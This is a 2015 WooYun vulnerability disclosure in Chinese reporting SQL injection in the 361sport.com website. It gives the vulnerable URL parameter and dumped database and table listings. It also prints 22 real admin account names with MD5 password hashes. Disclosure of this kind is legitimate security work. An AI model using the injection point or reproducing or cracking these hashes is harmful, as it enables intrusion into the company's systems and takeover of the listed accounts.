漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-096424
漏洞标题:361度官网存在SQL注入漏洞
相关厂商:361度
漏洞作者: Flygend
提交时间:2015-02-09 11:58
修复时间:2015-03-26 12:00
公开时间:2015-03-26 12:00
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:3
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-02-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-26: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
www.361sport.com/index.php?m=info&a=show&id=8存在注入
available databases [2]:
[*] information_schema
[*] wechat
Database: wechat
[137 tables]
+-------------------------+
| cares_order |
| cares_ordergoods |
| cares_team |
| love_sweetheart |
| love_user |
| shop_access |
| shop_addgive |
| shop_announce |
| shop_areas |
| shop_article |
| shop_cart |
| shop_category |
| shop_chain |
| shop_chain_out |
| shop_comment |
| shop_config |
| shop_convert |
| shop_coupon |
| shop_download |
| shop_express |
| shop_fen_address |
| shop_grade |
| shop_info |
| shop_itemback |
| shop_jmactivity |
| shop_lingygo |
| shop_link |
| shop_logistics |
| shop_lottery |
| shop_lottery_user |
| shop_lotteryitem |
| shop_member |
| shop_memberaddress |
| shop_membercollect |
| shop_memberexchange |
| shop_membergroup |
| shop_message |
| shop_model |
| shop_mysy |
| shop_mysyip |
| shop_node |
| shop_order |
| shop_ordergoods |
| shop_other |
| shop_package2 |
| shop_photo |
| shop_ppt |
| shop_pptcategory |
| shop_product |
| shop_productcategory |
| shop_region |
| shop_role |
| shop_scorehistory |
| shop_seckill |
| shop_set |
| shop_shopcart |
| shop_slide |
| shop_sms_code |
| shop_survey |
| shop_tjdate |
| shop_tjurl |
| shop_user |
| shop_userlog |
| shop_wish |
| wechat_access |
| wechat_active |
| wechat_active_banner |
| wechat_active_item |
| wechat_active_template |
| wechat_address |
| wechat_admin |
| wechat_admin_auth |
| wechat_admin_role |
| wechat_announce |
| wechat_area |
| wechat_article |
| wechat_auto |
| wechat_cart |
| wechat_category |
| wechat_class |
| wechat_collect |
| wechat_color |
| wechat_company |
| wechat_company_active |
| wechat_content |
| wechat_coupon |
| wechat_depot |
| wechat_down_price |
| wechat_flash |
| wechat_group_send |
| wechat_items |
| wechat_keywords |
| wechat_kucinfo |
| wechat_kucinfoall |
| wechat_lucky |
| wechat_matter |
| wechat_mbl |
| wechat_mbl_price |
| wechat_mbl_shoes |
| wechat_menu |
| wechat_model |
| wechat_mutual_talk |
| wechat_node |
| wechat_onecaresone |
| wechat_order |
| wechat_order_info |
| wechat_order_return |
| wechat_packet |
| wechat_packet_receive |
| wechat_product |
| wechat_productpic |
| wechat_role |
| wechat_rules |
| wechat_send |
| wechat_server |
| wechat_set |
| wechat_setting |
| wechat_shops |
| wechat_size |
| wechat_sport |
| wechat_technology |
| wechat_user |
| wechat_user_coupon |
| wechat_users |
| wechat_vmoareas |
| wechat_wmenu |
| wechat_wmenu_info |
| wechat_wnum |
| wechat_worldcup_country |
| wechat_worldcup_game |
| wechat_worldcup_guess |
| wechat_worldcup_user |
| wechat_yog |
| wechat_yog_active |
| wechat_yog_comment |
| wechat_yog_gym |
| wechat_yog_like |
+-------------------------+
漏洞证明:
Database: wechat
Table: wechat_admin
[22 entries]
+--------------+----------------------------------+
| account | password |
+--------------+----------------------------------+
| ljphappy0920 | 109b07ec709ada32cdcdc8e738310678 |
| 361wechat | 489ad500b434d911bf1b2486ceb569af |
| fj001 | 1d68634f803d2f2402b132f0972e936e |
| hz001 | 70090c5038037439b0619d6888333791 |
| dotop | bcf03375705232c40fa0e73942d97e03 |
| nj001 | 1d68634f803d2f2402b132f0972e936e |
| jn001 | 70090c5038037439b0619d6888333791 |
| Mrzeng | b16ff2161fb38a26ad2ea490b1b82fff |
| wwj | e7f0a743921612e4e9b032b7173d1dbc |
| jntest | 0147a7230991e18a3b841e317fd99136 |
| hf001 | 70090c5038037439b0619d6888333791 |
| hf-shangjia | 1d68634f803d2f2402b132f0972e936e |
| amys | 36a9c829179f3777d0cd47b090fd1bb3 |
| gd001 | 1d68634f803d2f2402b132f0972e936e |
| gx001 | e7f0a743921612e4e9b032b7173d1dbc |
| pp001 | e687f375fb0106a15196981ce06ab700 |
| lnxun | 1d68634f803d2f2402b132f0972e936e |
| 小雪 | 1d68634f803d2f2402b132f0972e936e |
| hzlpyd | e7f0a743921612e4e9b032b7173d1dbc |
| hzlped | e7f0a743921612e4e9b032b7173d1dbc |
| hzjfl | e7f0a743921612e4e9b032b7173d1dbc |
| bj001 | 926354b9808e4fdb5a042b11c967d23f |
+--------------+----------------------------------+
修复方案:
加个WAF吧,这也太暴露了。。。不过MD5跑不出来
版权声明:转载请注明来源 Flygend@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝